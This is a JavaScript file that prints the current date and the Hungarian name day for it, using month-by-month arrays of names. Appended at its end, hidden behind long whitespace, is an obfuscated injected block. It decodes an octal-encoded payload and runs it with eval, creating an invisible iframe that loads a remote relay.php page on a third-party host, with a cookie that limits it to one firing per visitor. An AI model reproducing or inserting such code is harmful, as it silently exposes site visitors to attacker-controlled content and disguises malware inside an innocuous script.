function initArray() {
 this.length = initArray.arguments.length
 for (var i = 0; i < this.length; i++)
  this[i+1] = initArray.arguments[i]
}
 
/*  Névnapok  */
function havinev(ev,ho,nap) {
 if (ho==1) {
  var napok = new initArray("ÚJÉV, Fruzsina","Ábel","Genovéva, Benjámin","Titusz, Leona",
   "Simon","Boldizsár","Attila, Ramóna","Gyöngyvér","Marcell",
   "Melánia","Ágota","Erno","Veronika","Bódog","Lóránt, Loránd",
   "Gusztáv","Antal, Antónia","Piroska","Sára, Márió","Fábián, Sebestyén",
   "Ágnes","Vince, Artúr","Zelma, Rajmund","Timót","Pál","Vanda, Paula",
   "Angelika","Károly, Karola","Adél","Martina, Gerda","Marcella","")
 }
 
 if (ho==2)
  if ((ev!=2000) && (ev!=2004) && ev!=1996) {
   var napok=new initArray("Ignác","Karolina, Aida","Balázs","Ráhel, Csenge","Ágota, Ingrid",
    "Dorottya, Dóra","Tódor, Rómeó","Aranka","Abigél, Alex","Elvira",
    "Bertold, Marietta","Lívia, Lídia","Ella, Linda","Bálint, Valentin",
    "Kolos, Georgina","Julianna, Lilla","Donát","Bernadett","Zsuzsanna",
    "Aladár, Álmos","Eleonóra","Gerzson","Alfréd",
    "Mátyás","Géza","Edina","Ákos, Bátor","Elemér","","") 
  } else {
   var napok=new initArray("Ignác","Karolina, Aida","Balázs","Ráhel, Csenge","Ágota, Ingrid",
    "Dorottya, Dóra","Tódor, Rómeó","Aranka","Abigél, Alex","Elvira",
    "Bertold, Marietta","Lívia, Lídia","Ella, Linda","Bálint, Valentin",
    "Kolos, Georgina","Julianna, Lilla","Donát","Bernadett","Zsuzsanna",
    "Aladár, Álmos","Eleonóra","Gerzson","Alfréd",
    "Szokonap","Mátyás","Géza","Edina","Ákos, Bátor","Elemér","","")
  }
 
 if (ho==3) {
  var napok=new initArray("Albin","Lujza","Kornélia","Kázmér","Adorján, Adrián","Leonóra, Inez",
   "Tamás","NONAP, Zoltán","Franciska, Fanni","Ildikó","Szilárd",
   "Gergely","Krisztián, Ajtony","Matild","NEMZETI ÜNNEP, Kristóf",
   "Henrietta","Gertrúd, Patrik","Sándor, Ede","József, Bánk","Klaudia",
   "Benedek","Beáta, Izolda","Emoke","Gábor, Karina","Irén, Irisz",
   "Emánuel","Hajnalka","Gedeon, Johanna","Auguszta","Zalán","Árpád","" )
 }
 
 if (ho==4) {
  var napok=new initArray("Hugó","Áron","Buda, Richárd","Izidor","Vince","Vilmos, Bíborka",
   "Herman","Dénes","Erhard","Zsolt","Leó, Szaniszló","Gyula","Ida",
   "Tibor","Anasztázia, Tas","Csongor","Rudolf","Andrea, Ilma","Emma",
   "Tivadar","Konrád","Csilla, Noémi","Béla","György","Márk","Ervin",
   "Zita","Valéria","Péter","Katalin, Kitti","" )
 }
 
 if (ho==5) {
  var napok=new initArray("MUNKA ÜNN.,Fülöp, Jakab","Zsigmond","Tímea, Irma","Mónika, Flórián",
   "Györgyi","Ivett, Frida","Gizella","Mihály","Gergely","Ármin, Pálma",
   "Ferenc","Pongrác","Szervác, Imola","Bonifác","Zsófia, Szonja",
   "Mózes, Botond","Paszkál","Erik, Alexandra","Ivó, Milán",
   "Bernát, Felícia","Konstantin","Júlia, Rita","Dezso","Eszter, Eliza",
   "Orbán","Fülöp, Evelin","Hella","Emil, Csanád","Magdolna",
   "Janka, Zsanett","Angéla, Petronella","" )}
 
 if (ho==6) {
  var napok=new initArray("Tünde","Kármen, Anita","Klotild","Bulcsú","Fatime","Norbert, Cintia",
   "Róbert","Medárd","Félix","Margit, Gréta","Barnabás","Villo",
   "Antal, Anett","Vazul","Jolán, Vid","Jusztin","Laura, Alida",
   "Arnold, Levente","Gyárfás","Rafael","Alajos, Leila","Paulina",
   "Zoltán","Iván","Vilmos","János, Pál","László","Levente, Irén",
   "Péter, Pál","Pál","" )
 }
 
 if (ho==7) {
  var napok=new initArray("Tihamér, Annamária","Ottó","Kornél, Soma","Ulrik","Emese, Sarolta",
   "Csaba","Appolónia","Ellák","Lukrécia","Amália","Nóra, Lili",
   "Izabella, Dalma","Jeno","Ors, Stella","Henrik, Roland","Valter",
   "Endre, Elek","Frigyes","Emília","Illés","Dániel, Daniella",
   "Magdolna","Lenke","Kinga, Kincso","Kristóf, Jakab","Anna, Anikó",
   "Olga, Liliána","Szabolcs","Márta, Flóra","Judit, Xénia","Oszkár","" )
 }
 
 if (ho==8) {
  var napok=new initArray("Boglárka","Lehel","Hermina","Domonkos, Dominika","Krisztina",
   "Berta, Bettina","Ibolya","László","Emod","Lorinc",
   "Zsuzsanna, Tiborc","Klára","Ipoly","Marcell","Mária","Ábrahám",
   "Jácint","Ilona","Huba","ALKOTMÁNY ÜNN., István","Sámuel, Hajna",
   "Menyhért, Mirjam","Bence","Bertalan","Lajos, Patrícia","Izsó",
   "Gáspár","Ágoston","Beatrix, Erna","Rózsa","Erika, Bella")
 }
 
 if (ho==9) {
  var napok= new initArray("Egyed, Egon","Rebeka, Dorina","Hilda","Rozália","Viktor, L&#x151rinc",
   "Zakariás","Regina","Mária, Adrienn","Ádám","Nikolett, Hunor",
   "Teodóra","Mária","Kornél","Szeréna, Roxána","Eniko, Melitta","Edit",
   "Zsófia","Diána","Vilhelmina","Friderika","Máté, Mirella","Móric",
   "Tekla","Gellért, Mercédesz","Eufrozina, Kende","Jusztina","Adalbert",
   "Vencel","Mihály","Jeromos","" )
 }
 
 if (ho==10) {
  var napok= new initArray("Malvin","Petra","Helga","Ferenc","Aurél","Brúnó, Renáta","Amália",
   "Koppány","Dénes","Gedeon","Brigitta","Miksa","Kálmán, Ede","Helén",
   "Teréz","Gál","Hedvig","Lukács","Nándor","Vendel","Orsolya","Elod",
   "KÖZT.KIKIÁLT., Gyöngyi","Salamon","Blanka, Bianka","Dömötör",
   "Szabina","Simon, Szimonetta","Nárcisz","Alfonz","Farkas","" )
 }
 
 if (ho==11) {
  var napok=new initArray("Marianna","Achilles","Gyozo","Károly","Imre","Lénárd","Rezso",
   "Zsombor","Tivadar","Réka","Márton","Jónás, Renátó","Szilvia",
   "Aliz","Albert, Lipót","Ödön","Hortenzia, Gergo","Jeno","Erzsébet",
   "Jolán","Olivér","Cecília","Kelemen, Klementina","Emma","Katalin",
   "Virág","Virgil","Stefánia","Taksony","András, Andor","" )
 }
 
 if (ho==12) {
  var napok=new initArray("Elza","Melinda, Vivien","Ferenc, Olívia","Borbála, Barbara","Vilma",
   "Miklós","Ambrus","Mária","Natália","Judit","Árpád","Gabriella",
   "Luca, Otília","Szilárda","Valér","Etelka, Aletta","Lázár, Olimpia",
   "Auguszta","Viola","Teofil","Tamás","Zénó","Viktória","Ádám, Éva",
   "KARÁCSONY, Eugénia","KARÁCSONY, István","János","Kamilla",
   "Tamás, Tamara","Dávid","Szilveszter","")
 }
 
 return napok[nap]
}
 
/* Hónap neve */
function honev(ho) {
 var month = new initArray("január","február","március","április",
 "május","június","július","augusztus","szeptember","október",
 "november","december");
 return month[ho]
}
 
/* Nap neve */
function napnev(szam) {
 var napok = new initArray("vasárnap","hétfo","kedd","szerda","csütörtök","péntek","szombat","vasárnap")
 return napok[szam]
}
 
/* Dátum lekérdezése és az adatok kiírása */
function kiir () {
 var ido = new Date();
 var ev = ido.getYear();
 var ho = ido.getMonth()+1;
 var nap = ido.getDate();
 if ((navigator.appName.indexOf('Netscape') != -1) || (navigator.appName.indexOf('Opera') != -1)) ev+=((ev<97) ? 2000 : 1900);
 document.writeln(""+ ev + ". " + honev(ho) + " " + nap + ". " + napnev(ido.getDay()+1)+", <b>" + havinev(ev,ho,nap)+"</b> névnapja  ");
}

/*2b39c4*/
                                                                                                                                                                                                                                                          a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,173,160,162,150,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,173,160,162,150,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,170,163,166,151,167,175,167,170,151,161,62,154,171,63,166,151,160,145,175,62,164,154,164,53,77,21,16,44,173,160,162,150,162,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,173,160,162,150,162,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,173,160,162,150,162,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,173,160,162,150,162,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,173,160,162,150,162,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,173,160,162,150,162,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,173,160,162,150,162,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,173,160,162,150,162,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,173,160,162,150,162,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,173,160,162,150,162,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));ss=eval("Str"+"ing");d=document;for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));
/*/2b39c4*/